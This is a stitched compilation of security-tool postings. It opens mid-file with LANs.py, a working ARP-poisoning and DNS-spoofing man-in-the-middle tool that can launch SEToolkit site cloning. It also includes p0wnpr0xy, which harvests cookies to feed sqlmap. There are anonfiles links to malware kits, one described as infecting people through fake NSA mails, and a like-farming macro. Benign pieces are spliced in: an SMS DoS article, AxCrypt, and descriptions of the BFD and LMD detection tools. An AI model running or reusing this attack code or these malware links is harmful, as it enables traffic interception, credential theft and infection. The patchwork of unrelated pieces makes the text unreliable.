os.system('/sbin/iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE') # Start threads def threads(args): rt = Thread(target=reactor.run, args=(False,)) #reactor must be started without signal handling since it's not in the main thread rt.daemon = True rt.start() if args.driftnet: dr = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/driftnet -i '+interface+' >/dev/null 2>&1',)) dr.daemon = True dr.start() if args.dnsspoof and not args.setoolkit: setoolkit = raw_input('[*] You are DNS spoofing '+args.dnsspoof+', would you like to start the Social Engineer\'s Toolkit for easy exploitation? [y/n]: ') if setoolkit == 'y': print '[*] Starting SEtoolkit. To clone '+args.dnsspoof+' hit options 1, 2, 3, 2, then enter '+args.dnsspoof try: se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',)) se.daemon = True se.start() except Exception: print '[-] Could not open SEToolkit, is it installed? Continuing as normal without it.' if args.nmapaggressive: print '[*] Starting '+R+'aggressive scan [nmap -e '+interface+' -T4 -A -v -Pn -oN '+victimIP+']'+W+' in background; results will be in a file '+victimIP+'.nmap.txt' try: n = Thread(target=os.system, args=('nmap -e '+interface+' -T4 -A -v -Pn -oN '+victimIP+'.nmap.txt '+victimIP+' >/dev/null 2>&1',)) n.daemon = True n.start() except Exception: print '[-] Aggressive Nmap scan failed, is nmap installed?' if args.setoolkit: print '[*] Starting SEtoolkit' try: se = Thread(target=os.system, args=('/usr/bin/xterm -e /usr/bin/setoolkit >/dev/null 2>&1',)) se.daemon = True se.start() except Exception: print '[-] Could not open SEToolkit, continuing without it.' 
def pcap_handler(args):
    global victimIP
    bad_args = [args.dnsspoof, args.beef, args.code, args.nmap, args.nmapaggressive, args.driftnet, args.interface]
    for x in bad_args:
        if x:
            sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')
    if args.pcap:
        if args.ipaddress:
            victimIP = args.ipaddress
            pcap = rdpcap(args.pcap)
            for payload in pcap:
                Parser(args).start(payload)
            sys.exit('[-] Finished parsing pcap file')
        else:
            sys.exit('[-] Please include the following argument when reading from a pcap file: -ip [target\'s IP address]')
    else:
        sys.exit('[-] When reading from pcap file you may only include the following arguments: -v, -u, -p, -pcap [pcap filename], and -ip [victim IP address]')

# Main loop
def main(args):
    global victimIP, interface
    if args.pcap:
        pcap_handler(args)
        sys.exit('[-] Finished parsing pcap file')

    # Check if root
    if not geteuid() == 0:
        exit("\nPlease run as root\n")

    # Find the gateway and interface
    ipr = Popen(['/sbin/ip', 'route'], stdout=PIPE, stderr=DN)
    ipr = ipr.communicate()[0]
    iprs = ipr.split('\n')
    ipr = ipr.split()
    if args.routerip:
        routerIP = args.routerip
    else:
        routerIP = ipr[2]
    for r in iprs:
        if '/' in r:
            IPprefix = r.split()[0]
    if args.interface:
        interface = args.interface
    else:
        interface = ipr[4]
    if 'eth' in interface or 'p3p' in interface:
        exit('[-] Wired interface found as default route, please connect wirelessly and retry or specify the active interface with the -i [interface] option. See active interfaces with [ip addr] or [ifconfig].')
    if args.ipaddress:
        victimIP = args.ipaddress
    else:
        au = active_users()
        au.users(IPprefix, routerIP)
        print '\n[*] Turning off monitor mode'
        os.system('/usr/sbin/airmon-ng stop %s >/dev/null 2>&1' % au.monmode)
        try:
            victimIP = raw_input('[*] Enter the non-router IP to spoof: ')
        except KeyboardInterrupt:
            exit('\n[-] Quitting')

    print "[*] Checking the DHCP and DNS server addresses..."
    # DHCP is a pain in the ass to craft
    dhcp = (Ether(dst='ff:ff:ff:ff:ff:ff')/
            IP(src="0.0.0.0", dst="255.255.255.255")/
            UDP(sport=68, dport=67)/
            BOOTP(chaddr='E3:2E:F4:DD:8R:9A')/
            DHCP(options=[("message-type", "discover"),
                          ("param_req_list",
                           chr(DHCPRevOptions["router"][0]),
                           chr(DHCPRevOptions["domain"][0]),
                           chr(DHCPRevOptions["server_id"][0]),
                           chr(DHCPRevOptions["name_server"][0]),
                          ), "end"]))
    ans, unans = srp(dhcp, timeout=5, retry=1)
    if ans:
        for s, r in ans:
            DHCPopt = r[0][DHCP].options
            DHCPsrvr = r[0][IP].src
            for x in DHCPopt:
                if 'domain' in x:
                    local_domain = x[1]
                else:
                    local_domain = 'None'
                if 'name_server' in x:
                    dnsIP = x[1]
    else:
        print "[-] No answer to DHCP packet sent to find the DNS server. Setting DNS and DHCP server to router IP."
        dnsIP = routerIP
        DHCPsrvr = routerIP
        local_domain = 'None'

    # Print the vars
    print_vars(DHCPsrvr, dnsIP, local_domain, routerIP, victimIP)

    if args.routermac:
        routerMAC = args.routermac
        print "[*] Router MAC: " + routerMAC
        logger.write("[*] Router MAC: " + routerMAC + '\n')
    else:
        try:
            routerMAC = Spoof().originalMAC(routerIP)
            print "[*] Router MAC: " + routerMAC
            logger.write("[*] Router MAC: " + routerMAC + '\n')
        except Exception:
            try:
                print "[-] Router did not respond to ARP request for MAC, attempting to pull the MAC from the ARP cache"
                arpcache = Popen(['/usr/sbin/arp', '-n'], stdout=PIPE, stderr=DN)
                split_lines = arpcache.communicate()[0].splitlines()
                arpoutput = split_lines[1].split()
                routerMAC = arpoutput[2]
                print "[*] Router MAC: " + routerMAC
                logger.write("[*] Router MAC: " + routerMAC + '\n')
            except Exception:
                sys.exit("[-] [arp -n] failed to give accurate router MAC address")

    if args.victimmac:
        victimMAC = args.victimmac
        print "[*] Victim MAC: " + victimMAC
        logger.write("[*] Victim MAC: " + victimMAC + '\n')
    else:
        try:
            victimMAC = Spoof().originalMAC(victimIP)
            print "[*] Victim MAC: " + victimMAC
            logger.write("[*] Victim MAC: " + victimMAC + '\n')
        except Exception:
            exit("[-] Could not get victim MAC address; try the -vmac [xx:xx:xx:xx:xx:xx] option if you know the victim's MAC address")

    if dnsIP != routerIP:
        try:
            dnsMAC = Spoof().originalMAC(dnsIP)
            print "[*] DNS server MAC: " + dnsMAC
        except Exception:
            # Leave dnsMAC unset so the poison/restore loops below skip the DNS server
            dnsMAC = None
            print "[-] Could not get DNS server MAC address; continuing"
    if dnsIP == routerIP:
        dnsMAC = routerMAC

    setup(victimMAC)
    Queued(args)
    threads(args)

    if args.nmap:
        print "\n[*] Running [nmap -T4 -O " + victimIP + "] this may take several minutes..."
        try:
            nmap = Popen(['/usr/bin/nmap', '-T4', '-O', '-e', interface, victimIP], stdout=PIPE, stderr=DN)
            nmap.wait()
            nmap = nmap.communicate()[0].splitlines()
            for x in nmap:
                if x != '':
                    print '[+]', x
                    logger.write('[+] ' + x + '\n')
        except Exception:
            print '[-] Nmap port and OS scan failed, is it installed?'
        print ''

    # Cleans up if Ctrl-C is caught
    def signal_handler(signal, frame):
        print 'Clearing iptables, sending healing packets, and turning off IP forwarding...'
        logger.close()
        open('/proc/sys/net/ipv4/ip_forward', 'w').write('0\n')
        if not dnsIP == routerIP and dnsMAC:
            Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
            Spoof().restore(routerIP, dnsIP, routerMAC, dnsMAC)
        os.system('/sbin/iptables -F')
        os.system('/sbin/iptables -X')
        os.system('/sbin/iptables -t nat -F')
        os.system('/sbin/iptables -t nat -X')
        Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
        Spoof().restore(routerIP, victimIP, routerMAC, victimMAC)
        exit(0)
    signal.signal(signal.SIGINT, signal_handler)

    while 1:
        # If DNS server is different from the router then we must spoof ourselves as the DNS server as well as the router
        if not dnsIP == routerIP and dnsMAC:
            Spoof().poison(dnsIP, victimIP, dnsMAC, victimMAC)
        Spoof().poison(routerIP, victimIP, routerMAC, victimMAC)
        time.sleep(1.5)

if __name__ == "__main__":
    main(parse_args())

Source: https://github.com/DanMcInerney/LANs.py
-
-
SMS Vulnerability In Nexus Phones Can Be Exploited To Force A Reboot Or Kill Cellular Connectivity Friday 11/29, at the DefCamp Security Conference 2013 in Bucharest, Romania, details were revealed about a potentially serious SMS vulnerability found in all current Nexus phones. The person responsible for the discovery is Bogdan Alecu, a system administrator at Levi9 and independent security researcher in Romania. When exploited, the attack can force the phone to reboot or destabilize certain services. The method of attack simply relies on sending a series of Class 0 "Flash" messages to the target phone. Flash messages are typically used for emergency or security purposes, appearing on the screen immediately instead of going to the default SMS application. When such a message arrives, no sounds are made but the background is dimmed and a single dialog box appears on top. Once 20-30 messages pile up, assuming the user isn't clearing them, it overloads the system and leads to a few potential side-effects. Most commonly, the result is an unresponsive device or an immediate reboot, but the Messages app or cellular radio may occasionally crash or freeze up in some instances. In the event that the cellular radio crashes, it may have more serious consequences. If a target has their SIM locked with a PIN code, the phone will not be able to reconnect until the code is entered. From time to time, it's also possible for the cellular radio to seize up, which can only be fixed by restarting the device. This is problematic because there are no audible prompts and the malfunction won't be seen until the owner unlocks their screen, leaving them without service for potentially several hours. Alecu first notified the Android Security Team of the issue over a year ago, but initially received only automated responses. Continued efforts were mostly unsuccessful, leading to the decision to disclose the vulnerability publicly.
To mitigate potential threats, he collaborated with Michael Mueller to develop Class0Firewall, an app designed to protect from Class 0 messages if they reach the threshold of becoming a denial-of-service attack. Bogdan notes that the current attack is only capable of destabilizing a phone, but theorizes that it might be possible to force remote code execution. Based on limited testing with devices from various vendors, the vulnerability appears to only affect the Nexus line running on all versions of stock Android through to the current release of KitKat. None of the OEM variants checked were susceptible to the attack. Hopefully the publicity will prompt Google to release a patch to block the issue as quickly as possible. Even if a fix is rolled out, it's not entirely clear if the Galaxy Nexus will receive it now that it is no longer getting OS updates. Ideally, the patch will be ported back to Android 4.3 and a security release will be made for the 2-year-old phone. Thanks, Bogdan Alecu! Via: SMS Vulnerability In Nexus Phones Can Be Exploited To Force A Reboot Or Kill Cellular Connectivity
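Class0Firewall's own logic is not shown in the article; the following is an added defensive example (my code, not Alecu's or Mueller's) that decodes the message class from the SMS Data Coding Scheme byte and keeps a sliding-window count of pending Class 0 messages, so a pile-up is flagged well before the 20-30 range the article reports. The DCS values, sender numbers and thresholds are constructed for the example.

```python
import time
from collections import deque

# Constructed thresholds: the article reports that 20-30 unacknowledged
# Class 0 messages destabilise the phone, so alert well below that.
FLASH_WINDOW_SECONDS = 300   # how long an unread flash message stays "pending"
FLASH_ALERT_THRESHOLD = 10   # pending flash messages that count as a flood


def sms_class(dcs):
    """Return the GSM 03.38 message class (0-3) carried by a Data Coding
    Scheme byte, or None when the DCS carries no class indication."""
    if dcs & 0xC0 == 0x00:              # general data coding group 00xx
        return dcs & 0x03 if dcs & 0x10 else None
    if dcs & 0xF0 == 0xF0:              # "data coding / message class" group
        return dcs & 0x03
    return None


def is_flash(dcs):
    """Class 0 is the immediate-display ('flash') class used in the attack."""
    return sms_class(dcs) == 0


class Class0Monitor:
    """Sliding-window counter of pending Class 0 messages.

    observe() records one incoming message and returns a verdict:
    'deliver' for ordinary traffic, 'flash' for a flash message below the
    threshold, 'flood' once pending flash messages reach the threshold.
    """

    def __init__(self, window=FLASH_WINDOW_SECONDS, threshold=FLASH_ALERT_THRESHOLD):
        self.window = window
        self.threshold = threshold
        self.pending = deque()   # (timestamp, sender) of unacknowledged flash messages
        self.senders = {}        # sender -> flash messages still inside the window

    def _expire(self, now):
        while self.pending and now - self.pending[0][0] > self.window:
            _, sender = self.pending.popleft()
            self.senders[sender] -= 1
            if self.senders[sender] == 0:
                del self.senders[sender]

    def acknowledge(self):
        """The user dismissed the flash dialogs: nothing is pending any more."""
        self.pending.clear()
        self.senders.clear()

    def observe(self, sender, dcs, now=None):
        now = time.time() if now is None else now
        self._expire(now)
        if not is_flash(dcs):
            return 'deliver'
        self.pending.append((now, sender))
        self.senders[sender] = self.senders.get(sender, 0) + 1
        if len(self.pending) >= self.threshold:
            return 'flood'
        return 'flash'

    def pending_count(self):
        return len(self.pending)

    def top_sender(self):
        """Sender with the most flash messages in the window (for blocking)."""
        if not self.senders:
            return None
        return max(self.senders, key=self.senders.get)


def replay(events, monitor=None):
    """Feed (timestamp, sender, dcs) events through a monitor; return verdicts."""
    monitor = monitor or Class0Monitor()
    return [monitor.observe(sender, dcs, now=t) for t, sender, dcs in events]


# Constructed sample traffic: two ordinary messages (DCS 0x00), then a burst of
# twelve Class 0 messages (DCS 0x10 = GSM 7-bit, class 0) one second apart.
SAMPLE_EVENTS = [(0, '+40700000001', 0x00), (5, '+40700000002', 0x00)] + \
    [(10 + i, '+40700000099', 0x10) for i in range(12)]

if __name__ == '__main__':
    for (t, sender, dcs), verdict in zip(SAMPLE_EVENTS, replay(SAMPLE_EVENTS)):
        print('t=%3d sender=%s dcs=0x%02x -> %s' % (t, sender, dcs, verdict))
```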
-
This archive contains all of the 129 exploits added to Packet Storm in November, 2013.
-
GongDa Decode! Version Nov-2013 Edit line http://www.youexe.com/windows.exe -- you exe download: https://anonfiles.com/file/ac83ca473c3c768e2783f4457f03fa66
-
mails are from United states government "Nsa" include editable document Custom design to infect people initially Government download https://anonfiles.com/file/ee6d9ecd6ff5751006cfec4f50784548
-
Save these commands in a .txt file in C:\Documents and Settings\[USER]\My Documents\iMacros\Macros

VERSION BUILD=7601105 RECORDER=FX
'eubest
TAB T=1
SET !ERRORIGNORE yes
URL GOTO=http://addmefast.com/free_points/facebook_likes.html
WAIT SECONDS=3
TAG POS=1 TYPE=A ATTR=TXT:Like
TAB T=2
FRAME F=0
TAG POS=1 TYPE=LABEL ATTR=ID:timelineHeadlineLikeButton
WAIT SECONDS=3
TAB T=2
TAB T=1
TAB CLOSEALLOTHERS
WAIT SECONDS=5

which you then rename to #Fb Page Likes.iim
-
Random Wordlist Generator is a simple multi-platform tool which allows you to create a wordlist of random words. You can generate random words using different sets of characters. With a mouse click, you can generate thousands of different words in a few minutes.

Install: To install the program you need Qt4 and cmake:

mkdir build
cd build
cmake -DCMAKE_INSTALL_PREFIX=/usr ..
make
make install

Authored by Francesco Mondello
Files from Francesco Mondello - Packet Storm
-
The services are very OK, I recommend them.
-
"Crack Me If You Can" - DEFCON 2010 Files - Packet Storm
Passwords - SkullSecurity
Index of /passwd/passwords
-
p0wnpr0xy.py is a simple Python script that acts as an http/https proxy and launches commands such as sqlmap against targets that are in-scope. It relies on httpservers.py from gnucitizen to do the heavy lifting. You can download his module from here and save it to the same directory as p0wnpr0xy. When you launch p0wnpr0xy you supply it with two arguments: 1) Part of the domain name for the in-scope hosts 2) The full command line for the tool you want to use against the target URL. p0wnpr0xy will start a proxy listener on port 8080. You modify your browser's proxy settings to browse through the proxy. The proxy will collect in-scope URLs and the cookies associated with each URL. It then walks you through all of the URLs that have been collected and gives you the option to launch the specified command on each URL. If you choose to attack the URL it will launch the command specified on the command line, replacing the string "{url}" with the URL collected and the string "{cookies}" with the cookies it has collected. Pretty simple, but it can make repetitive tasks easier. Here is a demonstration of how you can use p0wnpr0xy along with sqlmap.
http://vimeo.com/14667308

# p0wnpr0xy.py by Mark Baggett
# Download from www.pauldotcom.com
# create a self signed certificate and modify /path/to/cert/file string to avoid HTTPS socket errors
# download httpservers.py from http://code.google.com/p/gnucitizen/source/browse/trunk/httpservers.py and place it in the same directory
import httpservers
import SocketServer
from Queue import Queue
from threading import Thread
import time, re, sys, os
import pdb

class Handler(httpservers.SimpleObservableProxyHTTPRequestHandler):
    def observe_request(self, data):
        #pdb.set_trace()
        global inscopeurls, target_domain
        #print "REQ>>"+repr(data)[:50]
        # Queue only requests whose Host header ends in the in-scope domain
        matchstring = "Host:\s[\w_.]+%s" % target_domain
        matchscope = re.findall(matchstring, data, re.I)
        if matchscope:
            inscopeurls.put(repr(data))
        return data

    def observe_response(self, data):
        #print "RSP<<"+repr(data)[:50]
        return data

    def log_request(self, code):
        pass

class Server(SocketServer.ThreadingMixIn, httpservers.SimpleObservableProxyHTTPServer):
    pass

def proxyserver():
    print 'Starting server on localhost:8080...'
    srv = Server(('localhost', 8080), Handler, '/path/to/cert/file')
    srv.serve_forever()

def printhelp():
    print """Here is your help.
sample p0wnpr0xy.py -t targetdomain.com -c "./sqlmap -u {url} --cookie: {cookies}"
"""

# Set up some global variables
num_attack_threads = 2
inscopeurls = Queue()
verbose = 0

if not "-t" in sys.argv or not "-c" in sys.argv:
    printhelp()
    sys.exit(2)

for i in range(1, len(sys.argv), 1):
    if sys.argv[i] == '-t':
        target_domain = str(sys.argv[i+1])
    elif sys.argv[i] == '-c':
        cmd = " ".join(sys.argv[i+1:])
    elif sys.argv[i] == '-v':
        verbose = 1

proxythread = Thread(target=proxyserver)
proxythread.setDaemon(True)
proxythread.start()

while 1:
    if inscopeurls.qsize() == 0:
        #print "Nothing in Queue, Waiting."
        time.sleep(5)
        continue
    queueitem = inscopeurls.get()
    matches = re.findall("GET (/[\w._/\\-?=&]+).*Host:\s([\w_.]+)", queueitem, re.I)
    if matches:
        matchuri, matchdomain = matches[0]
        checkit = raw_input(":"+str(inscopeurls.qsize())+":P0wn http://"+matchdomain+matchuri+"? [Y/N/Q]")
        if checkit == "q" or checkit == "Q":
            sys.exit(2)
        if checkit == "y" or checkit == "Y":
            cookies = "".join(re.findall("cookie:\s([\w+;= ]+)", queueitem, re.I))
            cmd1 = cmd.replace("{cookies}", cookies)
            cmd2 = cmd1.replace("{url}", "http://"+matchdomain+matchuri)
            print "Launching "+cmd2
            os.system(cmd2)

Source: PaulDotCom: Archives
-
AxCrypt is the leading open source Windows file encryption software. It integrates seamlessly with Windows to compress, encrypt, decrypt, store, send and work with individual files. Personal Privacy and Security with AES-128 File Encryption and Compression for Windows 2000/2003/XP/Vista/2008/7. Double-click to automatically decrypt and open documents. Store strong keys on removable USB-devices.

Features
- Password Protect any number of files using strong encryption.
- Right-click integration with Windows Explorer makes AxCrypt the easiest way to encrypt individual files in Windows.
- Double-click integration makes it as easy to open, edit and save protected files as it is to work with unprotected files.
- Many additional features, but no configuration required. Just install it and use it.
- AxCrypt encrypts files that are safely and easily sent to other users via e-mail or any other means. Self-decrypting files are also supported, removing the need to install AxCrypt to decrypt.
- AxCrypt is translated into English, Danish, Dutch, French, German, Hungarian, Italian, Norwegian, Russian, Polish, Spanish and Swedish so chances are it speaks your preferred language.
- AxCrypt is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation.

You can download AxCrypt here: AxCrypt-1.7.2976.0-Setup.exe
Axantum Software AB | AxCrypt | File Encryption Software
-
-
Current Release: http://www.rfxn.com/downloads/bfd-current.tar.gz http://www.rfxn.com/appdocs/README.bfd http://www.rfxn.com/appdocs/CHANGELOG.bfd Description BFD is a modular shell script for parsing application logs and checking for authentication failures. It does this using a rules system where application specific options are stored including regular expressions for each unique auth format. The regular expressions are parsed against logs using the ‘sed’ tool (stream editor) which allows for excellent performance in all environments. In addition to the benefits of parsing logs in a single stream with sed, BFD also uses a log tracking system so logs are only parsed from the point which they were last read. This greatly assists in extending the performance of BFD even further as we are not constantly reading the same log data. The log tracking system is compatible with syslog/logrotate style log rotations which allows it to detect when rotations have happened and grab log tails from both the new log file and the rotated log file. You can leverage BFD to block attackers using any number of tools such as APF, Shorewall, raw iptables, ip route or execute any custom command. There is also a fully customizable e-mail alerting system with an e-mail template that is well suited for every day use or you can open it up and modify it. The attacker tracking in BFD is handled using simple flat text files that are size-controlled to prevent space constraints over time, ideal for diskless devices. There is also an attack pool where trending data is stored on all hosts that have been blocked including which rule the block was triggered by. In the execution process, there is simply a cron job that executes BFD once every 3 minutes by default. The cronjob can be run more frequently for those that desire it and doing so will not cause any performance issues (no less than once a minute). 
Although cron execution does not permit BFD to act in real time, the log tracking system ensures it never misses a beat in authentication failures. Further, using cron provides a reliable framework for consistent execution of BFD in a very simplified fashion across all *nix platforms. https://www.rfxn.com/projects/brute-force-detection/
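The log tracking and rule-matching described above, as an added example (my Python, not BFD's shell script or its rule files): a tracker that remembers inode and offset per log, picks up the tail of a rotated file before reading the new one, and counts authentication failures per source IP with per-application regular expressions. The rules, log lines and IP addresses are constructed for the example.

```python
import os
import re
import json
import tempfile
from collections import Counter

# Hypothetical rules in the spirit of BFD's per-application rule files: each
# regular expression captures the source IP in its first group.  Constructed
# here; they are not BFD's own definitions.
RULES = {
    'sshd': re.compile(r'sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (\d+\.\d+\.\d+\.\d+)'),
    'vsftpd': re.compile(r'vsftpd.*FAIL LOGIN: Client "(\d+\.\d+\.\d+\.\d+)"'),
}


class LogTracker:
    """Remember where each log was last read (inode + byte offset) and hand back
    only the new lines.  When logrotate has renamed the file, the tail of the
    rotated copy is read first, then the fresh file from the start."""

    def __init__(self, state_path):
        self.state_path = state_path
        try:
            with open(state_path) as f:
                self.state = json.load(f)
        except (OSError, ValueError):
            self.state = {}

    def _save(self):
        with open(self.state_path, 'w') as f:
            json.dump(self.state, f)

    def new_lines(self, path, rotated_path=None):
        st = os.stat(path)
        prev = self.state.get(path, {'inode': st.st_ino, 'offset': 0})
        rotated = prev['inode'] != st.st_ino or st.st_size < prev['offset']
        lines = []
        if rotated and rotated_path and os.path.exists(rotated_path):
            with open(rotated_path, 'rb') as f:          # finish the rotated copy
                f.seek(prev['offset'])
                lines.extend(f.read().decode('utf-8', 'replace').splitlines())
        with open(path, 'rb') as f:
            f.seek(0 if rotated else prev['offset'])
            lines.extend(f.read().decode('utf-8', 'replace').splitlines())
            self.state[path] = {'inode': st.st_ino, 'offset': f.tell()}
        self._save()
        return lines


def count_failures(lines, rules=RULES):
    """Apply every rule to every new line.  Returns failures per IP and an
    attack-pool style Counter of (ip, rule) showing which rule fired."""
    per_ip, per_rule = Counter(), Counter()
    for line in lines:
        for name, rx in rules.items():
            m = rx.search(line)
            if m:
                per_ip[m.group(1)] += 1
                per_rule[(m.group(1), name)] += 1
                break
    return per_ip, per_rule


def offenders(per_ip, trigger=5):
    """IPs at or above the failure trigger, i.e. the ones to hand to a blocker."""
    return sorted(ip for ip, n in per_ip.items() if n >= trigger)


def demo():
    """Constructed end-to-end run: first pass, incremental pass, then a
    logrotate-style rename.  Returns the per-IP counts of each pass and the pool."""
    d = tempfile.mkdtemp()
    log, old = os.path.join(d, 'auth.log'), os.path.join(d, 'auth.log.1')
    tracker = LogTracker(os.path.join(d, 'bfd.state'))
    pool = Counter()
    with open(log, 'w') as f:
        for i in range(4):
            f.write('Dec  1 10:00:%02d host sshd[1234]: Failed password for root from 203.0.113.5 port 4412 ssh2\n' % i)
    first, rules = count_failures(tracker.new_lines(log, old))
    pool += rules
    with open(log, 'a') as f:                            # only these two are new
        f.write('Dec  1 10:01:00 host sshd[1234]: Failed password for invalid user admin from 203.0.113.5 port 4413 ssh2\n')
        f.write('Dec  1 10:01:05 host vsftpd[77]: [anon] FAIL LOGIN: Client "198.51.100.7"\n')
    second, rules = count_failures(tracker.new_lines(log, old))
    pool += rules
    with open(log, 'a') as f:                            # written just before rotation
        f.write('Dec  1 10:02:00 host sshd[1234]: Failed password for root from 203.0.113.5 port 4414 ssh2\n')
    os.rename(log, old)
    with open(log, 'w') as f:                            # fresh file, new inode
        f.write('Dec  1 10:02:30 host sshd[1234]: Failed password for root from 198.51.100.7 port 5000 ssh2\n')
    third, rules = count_failures(tracker.new_lines(log, old))
    pool += rules
    return first, second, third, pool


if __name__ == '__main__':
    first, second, third, pool = demo()
    print(first, second, third, sep='\n')
    print('block:', offenders(first + second + third))
```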
-
Current Release: http://www.rfxn.com/downloads/maldetect-current.tar.gz http://www.rfxn.com/appdocs/README.maldetect http://www.rfxn.com/appdocs/CHANGELOG.maldetect Description Linux Malware Detect (LMD) is a malware scanner for Linux released under the GNU GPLv2 license, that is designed around the threats faced in shared hosted environments. It uses threat data from network edge intrusion detection systems to extract malware that is actively being used in attacks and generates signatures for detection. In addition, threat data is also derived from user submissions with the LMD checkout feature and from malware community resources. The signatures that LMD uses are MD5 file hashes and HEX pattern matches; they are also easily exported to any number of detection tools such as ClamAV. The driving force behind LMD is that there is currently limited availability of open source/restriction free tools for Linux systems that focus on malware detection and, more importantly, that get it right. Many of the AV products that perform malware detection on Linux have a very poor track record of detecting threats, especially those targeted at shared hosted environments. The threat landscape in shared hosted environments is unique from that of the standard AV products' detection suite in that they are detecting primarily OS level trojans, rootkits and traditional file-infecting viruses but missing the ever increasing variety of malware on the user account level which serves as an attack platform. Using the CYMRU malware hash registry, which provides malware detection data for 30 major AV packages, we can demonstrate this shortcoming in current threat detection. The following is an analysis of the core MD5 hashes (5,393) in LMD 1.4.0 and the percentage of major AV products that currently detect the hashes.
KNOWN MALWARE: 1029
% AV DETECT (AVG): 48
% AV DETECT (LOW): 58
% AV DETECT (HIGH): 80
UNKNOWN MALWARE: 4364

What this information means is that of the 5,393 hashes, 81% or 4,364 malware items are not detected / known by the top 30 major AV packages. The 1,029 malware items that are known / detected have an average of a 48% detection rate among major AV packages with a low / high margin of detection at 58 and 80 percent respectively. This clearly demonstrates the lacking capability in currently available tools and why it is important that something fill the void, especially in the Linux shared hosted environment.

Features:
- MD5 file hash detection for quick threat identification
- HEX based pattern matching for identifying threat variants
- statistical analysis component for detection of obfuscated threats (e.g: base64)
- integrated detection of ClamAV to use as scanner engine for improved performance
- integrated signature update feature with -u|--update
- integrated version update feature with -d|--update-ver
- scan-recent option to scan only files that have been added/changed in X days
- scan-all option for full path based scanning
- checkout option to upload suspected malware to rfxn.com for review / hashing
- full reporting system to view current and previous scan results
- quarantine queue that stores threats in a safe fashion with no permissions
- quarantine batching option to quarantine the results of a current or past scans
- quarantine restore option to restore files to original path, owner and perms
- quarantine suspend account option to Cpanel suspend or shell revoke users
- cleaner rules to attempt removal of malware injected strings
- cleaner batching option to attempt cleaning of previous scan reports
- cleaner rules to remove base64 and gzinflate(base64 injected malware
- daily cron based scanning of all changes in last 24h in user homedirs
- daily cron script compatible with stock RH style systems, Cpanel & Ensim
- kernel based inotify real time file scanning of created/modified/moved files
- kernel inotify monitor that can take path data from STDIN or FILE
- kernel inotify monitor convenience feature to monitor system users
- kernel inotify monitor can be restricted to a configurable user html root
- kernel inotify monitor with dynamic sysctl limits for optimal performance
- kernel inotify alerting through daily and/or optional weekly reports
- e-mail alert reporting after every scan execution (manual & daily)
- path, extension and signature based ignore options
- background scanner option for unattended scan operations
- verbose logging & output of all actions

Source Data: The defining difference with LMD is that it doesn’t just detect malware based on signatures/hashes that someone else generated but rather it is an encompassing project that actively tracks in the wild threats and generates signatures based on those real world threats that are currently circulating. There are four main sources for malware data that is used to generate LMD signatures:
- Network Edge IPS: The network I manage hosts over 35,000 web sites and as such receives a large amount of daily abuse, all of which is logged by our network edge IPS. The IPS events are processed to extract malware url’s, decode POST payload and base64/gzip encoded abuse data and ultimately that malware is retrieved, reviewed, classified and then signatures generated as appropriate. The vast majority of LMD signatures have been derived from IPS extracted data.
- Community Data: Data is aggregated from multiple community malware websites such as clean-mx and malwaredomainlist then processed to retrieve new malware, review, classify and then generate signatures.
- ClamAV: The HEX & MD5 detection signatures from ClamAV are monitored for relevant updates that apply to the target user group of LMD and added to the project as appropriate. To date there have been roughly 400 signatures ported from ClamAV while the LMD project has contributed back to ClamAV by submitting over 1,100 signatures and continues to do so on an ongoing basis.
- User Submission: LMD has a checkout feature that allows users to submit suspected malware for review; this has grown into a very popular feature and generates on average about 30-50 submissions per week.

Signature Updates: The LMD signatures are updated typically once per day or more frequently depending on incoming threat data from the LMD checkout feature, IPS malware extraction and other sources. The updating of signatures in LMD installations is performed daily through the default cron.daily script with the --update option, which can be run manually at any time. An RSS feed is available for tracking malware threat updates: http://www.rfxn.com/api/lmd

Detected Threats: LMD 1.4.0 has a total of 7,241 (5393 MD5 / 1848 HEX) signatures (before updates); below is a listing of the top 60 threats by prevalence detected by LMD:
base64.inject.unclassed bin.dccserv.irsexxy bin.fakeproc.Xnuxer bin.ircbot.nbot bin.ircbot.php3 bin.ircbot.unclassed
bin.pktflood.ABC123 bin.pktflood.osf bin.trojan.linuxsmalli c.ircbot.tsunami exp.linux.rstb exp.linux.unclassed
exp.setuid0.unclassed gzbase64.inject html.phishing.auc61 html.phishing.hsbc perl.connback.DataCha0s perl.connback.N2
perl.cpanel.cpwrap perl.ircbot.atrixteam perl.ircbot.bRuNo perl.ircbot.Clx perl.ircbot.devil perl.ircbot.fx29
perl.ircbot.magnum perl.ircbot.oldwolf perl.ircbot.putr4XtReme perl.ircbot.rafflesia perl.ircbot.UberCracker perl.ircbot.xdh
perl.ircbot.xscan perl.mailer.yellsoft perl.shell.cbLorD perl.shell.cgitelnet php.cmdshell.c100 php.cmdshell.c99
php.cmdshell.cih php.cmdshell.egyspider php.cmdshell.fx29 php.cmdshell.ItsmYarD php.cmdshell.Ketemu php.cmdshell.N3tshell
php.cmdshell.r57 php.cmdshell.unclassed php.defash.buno php.exe.globals php.include.remote php.ircbot.InsideTeam
php.ircbot.lolwut php.ircbot.sniper php.ircbot.vj_denie php.mailer.10hack php.mailer.bombam php.mailer.PostMan
php.phishing.AliKay php.phishing.mrbrain php.phishing.ReZulT php.pktflood.oey php.shell.rc99 php.shell.shellcomm

Real-Time Monitoring: The inotify monitoring feature is designed to monitor paths/users in real-time for file creation/modify/move operations. This option requires a kernel that supports inotify_watch (CONFIG_INOTIFY) which is found in kernels 2.6.13+ and CentOS/RHEL 5 by default. If you are running CentOS 4 you should consider an inbox upgrade with: Upgrade CentOS 4.8 to 5.x (32bit) | R-fx Networks

There are three modes that the monitor can be executed with and they relate to what will be monitored; they are USERS|PATHS|FILES.
e.g: maldet --monitor users
e.g: maldet --monitor /root/monitor_paths
e.g: maldet --monitor /home/mike,/home/ashton

The options break down as follows:
USERS: The users option will take the homedirs of all system users that are above inotify_minuid and monitor them. If inotify_webdir is set then only the user's webdir, if it exists, will be monitored.
PATHS: A comma spaced list of paths to monitor
FILE: A line spaced file list of paths to monitor

